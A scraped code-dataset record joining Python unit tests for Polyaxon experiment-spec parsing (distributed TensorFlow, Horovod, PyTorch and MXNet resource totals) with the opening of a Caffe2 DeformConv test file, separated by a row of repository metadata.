assert isinstance(spec.model, ClassifierConfig)
assert isinstance(spec.model.loss, MeanSquaredErrorConfig)
assert isinstance(spec.model.optimizer, AdamConfig)
assert spec.model.optimizer.learning_rate == 0.21
assert isinstance(spec.model.graph, GraphConfig)
assert len(spec.model.graph.layers) == 7
assert spec.model.graph.input_layers == [['images', 0, 0]]
assert len(spec.model.graph.output_layers) == 3
assert ['super_dense', 0, 0] in spec.model.graph.output_layers
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
assert len(spec.train.data_pipeline.feature_processors.feature_processors) == 1
assert isinstance(spec.eval.data_pipeline, TFRecordImagePipelineConfig)
assert spec.eval.data_pipeline.feature_processors is None
def test_advanced_file_with_custom_configs_and_resources_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/advanced_file_with_custom_configs_and_resources.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.TENSORFLOW
assert spec.environment.tensorflow.n_workers == 5
assert spec.environment.tensorflow.n_ps == 10
assert spec.environment.tensorflow.delay_workers_by_global_step is True
assert isinstance(spec.environment.tensorflow.run_config, RunConfig)
assert spec.environment.tensorflow.run_config.tf_random_seed == 100
assert spec.environment.tensorflow.run_config.save_summary_steps == 100
assert spec.environment.tensorflow.run_config.save_checkpoints_secs == 60
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.tensorflow.run_config.session, SessionConfig)
assert spec.environment.tensorflow.run_config.session.allow_soft_placement is True
assert spec.environment.tensorflow.run_config.session.intra_op_parallelism_threads == 2
assert spec.environment.tensorflow.run_config.session.inter_op_parallelism_threads == 2
assert isinstance(spec.environment.tensorflow.default_worker_config, SessionConfig)
assert spec.environment.tensorflow.default_worker_config.allow_soft_placement is True
assert spec.environment.tensorflow.default_worker_config.intra_op_parallelism_threads == 1
assert spec.environment.tensorflow.default_worker_config.inter_op_parallelism_threads == 1
assert isinstance(spec.environment.tensorflow.worker_configs[0], SessionConfig)
assert spec.environment.tensorflow.worker_configs[0].index == 3
assert spec.environment.tensorflow.worker_configs[0].allow_soft_placement is False
assert spec.environment.tensorflow.worker_configs[0].intra_op_parallelism_threads == 5
assert spec.environment.tensorflow.worker_configs[0].inter_op_parallelism_threads == 5
assert spec.environment.tensorflow.ps_configs is None
assert spec.environment.tensorflow.worker_resources is None
assert isinstance(spec.environment.tensorflow.default_ps_resources, PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.default_ps_resources.cpu, K8SResourcesConfig)
assert spec.environment.tensorflow.default_ps_resources.cpu.requests == 2
assert spec.environment.tensorflow.default_ps_resources.cpu.limits == 4
assert isinstance(spec.environment.tensorflow.ps_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.ps_resources[0].memory, K8SResourcesConfig)
assert spec.environment.tensorflow.ps_resources[0].index == 9
assert spec.environment.tensorflow.ps_resources[0].memory.requests == 512
assert spec.environment.tensorflow.ps_resources[0].memory.limits == 1024
        # check that the properties returning lists of configs and resources work
cluster, is_distributed = spec.cluster_def
worker_configs = TensorflowSpecification.get_worker_configs(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_configs) == spec.environment.tensorflow.n_workers
assert set(worker_configs.values()) == {
spec.environment.tensorflow.default_worker_config,
spec.environment.tensorflow.worker_configs[0]}
assert TensorflowSpecification.get_ps_configs(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
assert TensorflowSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
) == {}
ps_resources = TensorflowSpecification.get_ps_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(ps_resources) == spec.environment.tensorflow.n_ps
assert set(ps_resources.values()) == {
spec.environment.tensorflow.default_ps_resources,
spec.environment.tensorflow.ps_resources[0]}
# Check total resources
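        # (Worked arithmetic: the master pod requests 1 CPU; the workers define
        # session configs but no resources; 9 ps pods use the default 2-CPU
        # config while the overridden ps contributes memory only -- hence
        # CPU requests of 1 + 2*9 and the 512/1024 memory figures below.)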
assert spec.total_resources == {
'cpu': {'requests': 1 + 2 * 9, 'limits': 2 + 4 * 9},
'memory': {'requests': 512, 'limits': 1024},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5,
TaskType.PS: 10}, True)
assert isinstance(spec.model, ClassifierConfig)
assert isinstance(spec.model.loss, MeanSquaredErrorConfig)
assert isinstance(spec.model.optimizer, AdamConfig)
assert spec.model.optimizer.learning_rate == 0.21
assert isinstance(spec.model.graph, GraphConfig)
assert len(spec.model.graph.layers) == 7
assert spec.model.graph.input_layers == [['images', 0, 0]]
assert len(spec.model.graph.output_layers) == 3
assert ['super_dense', 0, 0] in spec.model.graph.output_layers
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
assert len(spec.train.data_pipeline.feature_processors.feature_processors) == 1
assert isinstance(spec.eval.data_pipeline, TFRecordImagePipelineConfig)
assert spec.eval.data_pipeline.feature_processors is None
def test_matrix_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/matrix_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings.matrix['lr'], MatrixConfig)
assert isinstance(spec.settings.matrix['loss'], MatrixConfig)
assert spec.settings.matrix['lr'].to_dict() == {
'logspace': {'start': 0.01, 'stop': 0.1, 'num': 5}}
assert spec.settings.matrix['loss'].to_dict() == {'values': ['MeanSquaredError',
'AbsoluteDifference']}
assert spec.matrix_space == 10
assert isinstance(spec.settings, SettingsConfig)
assert spec.settings.concurrent_experiments == 2
assert spec.search_algorithm == SearchAlgorithms.GRID
assert spec.settings.early_stopping is None
assert spec.early_stopping == []
# assert spec.experiments_def == (
# 10,
# None,
# 2,
# SearchAlgorithms.GRID
# )
spec = spec.get_experiment_spec(matrix_declaration=spec.matrix_declaration_test)
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
model = spec.model
assert isinstance(model, RegressorConfig)
assert isinstance(model.loss, (MeanSquaredErrorConfig, AbsoluteDifferenceConfig))
assert isinstance(model.optimizer, AdamConfig)
assert isinstance(model.graph, GraphConfig)
assert len(model.graph.layers) == 4
assert model.graph.input_layers == [['images', 0, 0]]
last_layer = model.graph.layers[-1].name
assert model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
def test_matrix_early_stopping_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/matrix_file_early_stopping.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings.matrix['lr'], MatrixConfig)
assert isinstance(spec.settings.matrix['loss'], MatrixConfig)
assert spec.settings.matrix['lr'].to_dict() == {
'logspace': {'start': 0.01, 'stop': 0.1, 'num': 5}}
assert spec.settings.matrix['loss'].to_dict() == {'values': ['MeanSquaredError',
'AbsoluteDifference']}
assert spec.matrix_space == 10
assert isinstance(spec.settings, SettingsConfig)
assert spec.settings.concurrent_experiments == 2
assert spec.settings.random_search.n_experiments == 5
assert spec.early_stopping == spec.settings.early_stopping
assert len(spec.settings.early_stopping) == 1
assert isinstance(spec.settings.early_stopping[0], EarlyStoppingMetricConfig)
# assert spec.experiments_def == (
# 10,
# 5,
# 2,
# SearchAlgorithms.RANDOM
# )
spec = spec.get_experiment_spec(matrix_declaration=spec.matrix_declaration_test)
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
model = spec.model
assert isinstance(model, RegressorConfig)
assert isinstance(model.loss, (MeanSquaredErrorConfig, AbsoluteDifferenceConfig))
assert isinstance(model.optimizer, AdamConfig)
assert isinstance(model.graph, GraphConfig)
assert len(model.graph.layers) == 4
assert model.graph.input_layers == [['images', 0, 0]]
last_layer = model.graph.layers[-1].name
assert model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
def test_matrix_large_n_experiments_ignored_file_passes(self):
plxfile = PolyaxonFile(
os.path.abspath('tests/fixtures/matrix_file_ignored_n_experiments.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings.matrix['lr'], MatrixConfig)
assert isinstance(spec.settings.matrix['loss'], MatrixConfig)
assert spec.settings.matrix['lr'].to_dict() == {
'logspace': {'start': 0.01, 'stop': 0.1, 'num': 5}}
assert spec.settings.matrix['loss'].to_dict() == {'values': ['MeanSquaredError',
'AbsoluteDifference']}
assert spec.matrix_space == 10
assert isinstance(spec.settings, SettingsConfig)
assert spec.settings.concurrent_experiments == 2
assert spec.search_algorithm == SearchAlgorithms.RANDOM
assert spec.settings.random_search.n_experiments == 300
assert spec.early_stopping == []
# assert plxfile.experiments_def == (
# 10,
# None,
# 2,
# SearchAlgorithms.GRID
# )
spec = spec.get_experiment_spec(matrix_declaration=spec.matrix_declaration_test)
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
model = spec.model
assert isinstance(model, RegressorConfig)
assert isinstance(model.loss, (MeanSquaredErrorConfig, AbsoluteDifferenceConfig))
assert isinstance(model.optimizer, AdamConfig)
assert isinstance(model.graph, GraphConfig)
assert len(model.graph.layers) == 4
assert model.graph.input_layers == [['images', 0, 0]]
last_layer = model.graph.layers[-1].name
assert model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
def test_one_matrix_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/one_matrix_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert spec.settings is not None
assert isinstance(spec.settings.matrix['loss'], MatrixConfig)
assert spec.settings.matrix['loss'].to_dict() == {'values': ['MeanSquaredError',
'AbsoluteDifference']}
assert spec.matrix_space == 2
spec = spec.get_experiment_spec(matrix_declaration=spec.matrix_declaration_test)
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
model = spec.model
assert isinstance(model, RegressorConfig)
assert isinstance(model.loss, (MeanSquaredErrorConfig, AbsoluteDifferenceConfig))
assert isinstance(model.optimizer, AdamConfig)
assert isinstance(model.graph, GraphConfig)
assert len(model.graph.layers) == 4
assert model.graph.input_layers == [['images', 0, 0]]
last_layer = model.graph.layers[-1].name
assert model.graph.output_layers == [[last_layer, 0, 0]]
assert isinstance(spec.train.data_pipeline, TFRecordImagePipelineConfig)
def test_run_simple_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/run_exec_simple_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'video_prediction'
assert spec.settings is None
assert spec.is_runnable
assert spec.environment is None
assert spec.framework is None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
assert spec.model is None
run_exec = spec.run_exec
assert isinstance(run_exec, RunExecConfig)
assert run_exec.cmd == "video_prediction_train --model=DNA --num_masks=1"
def test_run_matrix_file_passes(self):
plxfile = PolyaxonFile(os.path.abspath('tests/fixtures/run_exec_matrix_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'video_prediction'
assert isinstance(spec.settings.matrix['model'], MatrixConfig)
assert spec.settings.matrix['model'].to_dict() == {'values': ['CDNA', 'DNA', 'STP']}
assert spec.matrix_space == 3
assert isinstance(spec.settings, SettingsConfig)
declarations = spec.matrix_declaration_test
spec = spec.get_experiment_spec(declarations)
assert spec.is_runnable
assert spec.environment is None
assert spec.settings is not None
assert spec.settings.logging is not None
assert spec.cluster_def == ({TaskType.MASTER: 1}, False)
assert spec.model is None
run_exec = spec.run_exec
assert isinstance(run_exec, RunExecConfig)
declarations['num_masks'] = 1 if declarations['model'] == 'DNA' else 10
assert run_exec.cmd == ('video_prediction_train '
'--model="{model}" '
'--num_masks={num_masks}').format(
**declarations
)
def test_distributed_tensorflow_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/distributed_tensorflow_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.TENSORFLOW
assert spec.environment.tensorflow.n_workers == 5
assert spec.environment.tensorflow.n_ps == 10
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.tensorflow.default_worker_resources,
PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.default_worker_resources.cpu,
K8SResourcesConfig)
assert spec.environment.tensorflow.default_worker_resources.cpu.requests == 3
assert spec.environment.tensorflow.default_worker_resources.cpu.limits == 3
assert isinstance(spec.environment.tensorflow.default_worker_resources.memory,
K8SResourcesConfig)
assert spec.environment.tensorflow.default_worker_resources.memory.requests == 256
assert spec.environment.tensorflow.default_worker_resources.memory.limits == 256
assert isinstance(spec.environment.tensorflow.worker_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.worker_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.tensorflow.worker_resources[0].index == 3
assert spec.environment.tensorflow.worker_resources[0].memory.requests == 300
assert spec.environment.tensorflow.worker_resources[0].memory.limits == 300
assert isinstance(spec.environment.tensorflow.default_ps_resources, PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.default_ps_resources.cpu, K8SResourcesConfig)
assert spec.environment.tensorflow.default_ps_resources.cpu.requests == 2
assert spec.environment.tensorflow.default_ps_resources.cpu.limits == 4
assert isinstance(spec.environment.tensorflow.ps_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.tensorflow.ps_resources[0].memory, K8SResourcesConfig)
assert spec.environment.tensorflow.ps_resources[0].index == 9
assert spec.environment.tensorflow.ps_resources[0].memory.requests == 512
assert spec.environment.tensorflow.ps_resources[0].memory.limits == 1024
        # check that the properties returning lists of configs and resources work
cluster, is_distributed = spec.cluster_def
worker_resources = TensorflowSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_resources) == spec.environment.tensorflow.n_workers
assert set(worker_resources.values()) == {
spec.environment.tensorflow.default_worker_resources,
spec.environment.tensorflow.worker_resources[0]}
ps_resources = TensorflowSpecification.get_ps_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(ps_resources) == spec.environment.tensorflow.n_ps
assert set(ps_resources.values()) == {
spec.environment.tensorflow.default_ps_resources,
spec.environment.tensorflow.ps_resources[0]}
# Check total resources
assert spec.total_resources == {
'cpu': {'requests': 1 + 3 * 4 + 2 * 9, 'limits': 2 + 3 * 4 + 4 * 9},
'memory': {'requests': 300 + 256 * 4 + 512, 'limits': 300 + 256 * 4 + 1024},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5,
TaskType.PS: 10}, True)
def test_distributed_horovod_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/distributed_horovod_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.HOROVOD
assert spec.environment.horovod.n_workers == 5
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.horovod.default_worker_resources,
PodResourcesConfig)
assert isinstance(spec.environment.horovod.default_worker_resources.cpu,
K8SResourcesConfig)
assert spec.environment.horovod.default_worker_resources.cpu.requests == 3
assert spec.environment.horovod.default_worker_resources.cpu.limits == 3
assert isinstance(spec.environment.horovod.default_worker_resources.memory,
K8SResourcesConfig)
assert spec.environment.horovod.default_worker_resources.memory.requests == 256
assert spec.environment.horovod.default_worker_resources.memory.limits == 256
assert isinstance(spec.environment.horovod.worker_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.horovod.worker_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.horovod.worker_resources[0].index == 3
assert spec.environment.horovod.worker_resources[0].memory.requests == 300
assert spec.environment.horovod.worker_resources[0].memory.limits == 300
        # check that the properties returning lists of configs and resources work
cluster, is_distributed = spec.cluster_def
worker_resources = HorovodSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_resources) == spec.environment.horovod.n_workers
assert set(worker_resources.values()) == {
spec.environment.horovod.default_worker_resources,
spec.environment.horovod.worker_resources[0]}
# Check total resources
assert spec.total_resources == {
'cpu': {'requests': 1 + 3 * 4, 'limits': 2 + 3 * 4},
'memory': {'requests': 300 + 256 * 4, 'limits': 300 + 256 * 4},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5}, True)
def test_distributed_pytorch_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/distributed_pytorch_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.PYTORCH
assert spec.environment.pytorch.n_workers == 5
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.pytorch.default_worker_resources,
PodResourcesConfig)
assert isinstance(spec.environment.pytorch.default_worker_resources.cpu,
K8SResourcesConfig)
assert spec.environment.pytorch.default_worker_resources.cpu.requests == 3
assert spec.environment.pytorch.default_worker_resources.cpu.limits == 3
assert isinstance(spec.environment.pytorch.default_worker_resources.memory,
K8SResourcesConfig)
assert spec.environment.pytorch.default_worker_resources.memory.requests == 256
assert spec.environment.pytorch.default_worker_resources.memory.limits == 256
assert isinstance(spec.environment.pytorch.worker_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.pytorch.worker_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.pytorch.worker_resources[0].index == 3
assert spec.environment.pytorch.worker_resources[0].memory.requests == 300
assert spec.environment.pytorch.worker_resources[0].memory.limits == 300
        # check that the properties returning lists of configs and resources work
cluster, is_distributed = spec.cluster_def
worker_resources = PytorchSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_resources) == spec.environment.pytorch.n_workers
assert set(worker_resources.values()) == {
spec.environment.pytorch.default_worker_resources,
spec.environment.pytorch.worker_resources[0]}
# Check total resources
assert spec.total_resources == {
'cpu': {'requests': 1 + 3 * 4, 'limits': 2 + 3 * 4},
'memory': {'requests': 300 + 256 * 4, 'limits': 300 + 256 * 4},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5}, True)
def test_distributed_mxnet_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/distributed_mxnet_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.MXNET
assert spec.environment.mxnet.n_workers == 5
assert spec.environment.mxnet.n_ps == 10
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.mxnet.default_worker_resources,
PodResourcesConfig)
assert isinstance(spec.environment.mxnet.default_worker_resources.cpu,
K8SResourcesConfig)
assert spec.environment.mxnet.default_worker_resources.cpu.requests == 3
assert spec.environment.mxnet.default_worker_resources.cpu.limits == 3
assert isinstance(spec.environment.mxnet.default_worker_resources.memory,
K8SResourcesConfig)
assert spec.environment.mxnet.default_worker_resources.memory.requests == 256
assert spec.environment.mxnet.default_worker_resources.memory.limits == 256
assert isinstance(spec.environment.mxnet.worker_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.mxnet.worker_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.mxnet.worker_resources[0].index == 3
assert spec.environment.mxnet.worker_resources[0].memory.requests == 300
assert spec.environment.mxnet.worker_resources[0].memory.limits == 300
assert isinstance(spec.environment.mxnet.default_ps_resources,
PodResourcesConfig)
assert isinstance(spec.environment.mxnet.default_ps_resources.cpu,
K8SResourcesConfig)
assert spec.environment.mxnet.default_ps_resources.cpu.requests == 2
assert spec.environment.mxnet.default_ps_resources.cpu.limits == 4
assert isinstance(spec.environment.mxnet.ps_resources[0],
PodResourcesConfig)
assert isinstance(spec.environment.mxnet.ps_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.mxnet.ps_resources[0].index == 9
assert spec.environment.mxnet.ps_resources[0].memory.requests == 512
assert spec.environment.mxnet.ps_resources[0].memory.limits == 1024
        # check that the properties returning lists of configs and resources work
cluster, is_distributed = spec.cluster_def
worker_resources = MXNetSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_resources) == spec.environment.mxnet.n_workers
assert set(worker_resources.values()) == {
spec.environment.mxnet.default_worker_resources,
spec.environment.mxnet.worker_resources[0]}
ps_resources = MXNetSpecification.get_ps_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(ps_resources) == spec.environment.mxnet.n_ps
assert set(ps_resources.values()) == {
spec.environment.mxnet.default_ps_resources,
spec.environment.mxnet.ps_resources[0]}
# Check total resources
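        # (Worked arithmetic: master requests 1 CPU; 4 workers use the default
        # 3-CPU config while the overridden worker adds memory only; 9 ps pods
        # use the default 2-CPU config while the overridden ps adds memory
        # only -- hence CPU requests of 1 + 3*4 + 2*9 below.)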
assert spec.total_resources == {
'cpu': {'requests': 1 + 3 * 4 + 2 * 9, 'limits': 2 + 3 * 4 + 4 * 9},
'memory': {'requests': 300 + 256 * 4 + 512, 'limits': 300 + 256 * 4 + 1024},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5,
TaskType.SERVER: 10}, True)
| 50.465608
| 99
| 0.681825
| 4,021
| 38,152
| 6.314101
| 0.056702
| 0.087439
| 0.084288
| 0.065934
| 0.910828
| 0.891804
| 0.869117
| 0.848163
| 0.751507
| 0.706763
| 0
| 0.016347
| 0.230368
| 38,152
| 755
| 100
| 50.53245
| 0.848313
| 0.021519
| 0
| 0.667183
| 0
| 0
| 0.040938
| 0.020992
| 0
| 0
| 0
| 0
| 0.611455
| 1
| 0.027864
| false
| 0.021672
| 0.027864
| 0
| 0.057276
| 0.001548
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 31e407499063f380188c03157c1ae29f391f5de3
| 19,350
| py
| Python
| caffe2/python/operator_test/deform_conv_test.py
| wenhaopeter/read_pytorch_code
| 491f989cd918cf08874dd4f671fb7f0142a0bc4f
| ["Intel", "X11"] | 40
| 2021-06-01T07:37:59.000Z
| 2022-03-25T01:42:09.000Z
| caffe2/python/operator_test/deform_conv_test.py
| wenhaopeter/read_pytorch_code
| 491f989cd918cf08874dd4f671fb7f0142a0bc4f
| ["Intel", "X11"] | 14
| 2021-06-01T11:52:46.000Z
| 2022-03-25T02:13:08.000Z
| caffe2/python/operator_test/deform_conv_test.py
| wenhaopeter/read_pytorch_code
| 491f989cd918cf08874dd4f671fb7f0142a0bc4f
| ["Intel", "X11"] | 7
| 2021-07-20T19:34:26.000Z
| 2022-03-13T21:07:36.000Z
|
from __future__ import absolute_import, division, print_function
import os
import unittest
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from caffe2.proto import caffe2_pb2
from caffe2.python import core, utils, workspace
from hypothesis import assume, given
def _cudnn_supports(dilation=False, nhwc=False):
"""Return True if cuDNN supports this configuration."""
v = workspace.GetCuDNNVersion()
if dilation and v < 6000:
# Dilation not supported until v6
return False
if dilation and nhwc:
# Dilation and NHWC not supported together
return False
return True
def _conv_1d_output_size(size, kernel, pad, dilation, stride):
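    # Standard convolution arithmetic: a dilated kernel spans
    # dilation * (kernel - 1) + 1 input elements, so the output length is
    # floor((size + 2 * pad - dilated_kernel) / stride) + 1, clamped to >= 1.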
return max(1, int((size + pad * 2 - (dilation * (kernel - 1) + 1)) / stride) + 1)
def _conv_2d_output_size(size, kernel, pad_h, pad_w, dilation, stride_h, stride_w):
return [
_conv_1d_output_size(size, kernel, pad_h, dilation, stride_h),
_conv_1d_output_size(size, kernel, pad_w, dilation, stride_w),
]
def _conv_2d_offsets_dims(
batch_size,
size,
kernel,
pad_h,
pad_w,
dilation,
stride_h,
stride_w,
deformable_group,
):
dims = [batch_size, 2 * kernel * kernel * deformable_group]
dims.extend(
_conv_2d_output_size(size, kernel, pad_h, pad_w, dilation, stride_h, stride_w)
)
return dims
def _conv_2d_random_offsets(batch_size, kernel, dims, num_deformable_group):
o = []
for y0 in range(0, kernel):
for x0 in range(0, kernel):
# stay away from integer offsets which correspond to "ridges" on the
# interpolated surface resulting in less precise estimates
x = np.random.randint(0, kernel) + np.random.uniform(0.05, 0.95)
y = np.random.randint(0, kernel) + np.random.uniform(0.05, 0.95)
o.append(y - y0)
o.append(x - x0)
o = o * num_deformable_group
e = []
for v in o:
e.append([[v] * dims[1]] * dims[0])
return np.array([e] * batch_size).astype(np.float32)
def _conv_2d_shuffle_offsets(
batch_size, kernel, dims, num_deformable_group, input_channels, output_channels
):
o = []
w0 = [[0 for x in range(kernel)] for y in range(kernel)]
for y0 in range(0, kernel):
for x0 in range(0, kernel):
x = np.random.randint(0, kernel)
y = np.random.randint(0, kernel)
o.append(y - y0)
o.append(x - x0)
w0[y][x] += 1
o = o * num_deformable_group
e = []
for v in o:
e.append([[v] * int(dims[1])] * int(dims[0]))
w0 = [[w0] * input_channels] * output_channels
return (
np.array([e] * batch_size).astype(np.float32),
utils.NCHW2NHWC(np.array(w0).astype(np.float32)),
)
class TestConvolution(hu.HypothesisTestCase):
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride=st.integers(1, 3),
pad=st.integers(0, 3),
kernel=st.integers(1, 5),
dilation=st.integers(1, 3),
size=st.integers(7, 10),
input_channels=st.integers(1, 8),
output_channels=st.integers(1, 8),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
engine=st.sampled_from(["", "CUDNN", "MKLDNN"]),
use_bias=st.booleans(),
deformable_group=st.integers(1, 3),
**hu.gcs_gpu_only
)
def test_null_offset_convolution(
self,
stride,
pad,
kernel,
dilation,
size,
input_channels,
output_channels,
batch_size,
order,
engine,
use_bias,
deformable_group,
gc,
dc,
):
dkernel = dilation * (kernel - 1) + 1
if gc.device_type == caffe2_pb2.CUDA and engine == "CUDNN":
assume(_cudnn_supports(dilation=(dilation > 1), nhwc=(order == "NHWC")))
assume(engine != "MKLDNN" or use_bias is True)
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
deformable_group=deformable_group,
)
offset_dims = _conv_2d_offsets_dims(
batch_size,
size,
kernel,
pad,
pad,
dilation,
stride,
stride,
deformable_group,
)
X = (
np.random.rand(batch_size, size, size, input_channels).astype(np.float32)
- 0.5
)
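        # With an all-zero offset blob, DeformConv must reduce to an ordinary
        # Conv on the same weights, which is what the reference op below checks.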
o = np.zeros(tuple(offset_dims), np.float32)
w = (
np.random.rand(output_channels, kernel, kernel, input_channels).astype(
np.float32
)
- 0.5
)
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
        if size + pad + pad < dkernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
def reference_conv_op(*args):
reference_op = core.CreateOperator(
"Conv",
["X", "w", "b"] if use_bias else ["X", "w"],
["Y0"],
stride=stride,
